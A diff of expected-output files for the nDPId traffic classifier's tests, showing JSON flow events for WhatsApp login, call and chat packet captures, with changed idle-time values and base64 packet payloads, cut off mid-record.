+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00848{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -339,12 +335,16 @@ 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1253,"packets-processed":1251,"total-skipped-flows":0,"total-l4-data-len":132660,"total-not-detected-flows":0,"total-guessed-flows":22,"total-detected-flows":35,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":348,"global_ts_msec":1432582361929} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1253/1251 diff --git a/test/results/whatsapp_login_chat.pcap.out b/test/results/whatsapp_login_chat.pcap.out index d7834017b..37303119a 100644 --- a/test/results/whatsapp_login_chat.pcap.out +++ b/test/results/whatsapp_login_chat.pcap.out @@ -8,17 +8,17 @@ 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582379571,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582379571,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+Me8AAEARwurAqAIBwKgCBAA18QEAqrdkrIuBgAABAAgAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAAiQABLitsy\/ADAABAAEAAAIkAASeVTpnwAwAAQABAAACJAAEuK2zLMAMAAEAAQAAAiQABLitsyPADAABAAEAAAIkAARsqLDGwAwAAQABAAACJAAEnlU6NMAMAAEAAQAAAiQABJ5VOg\/ADAABAAEAAAIkAASeVTol"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/DlBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y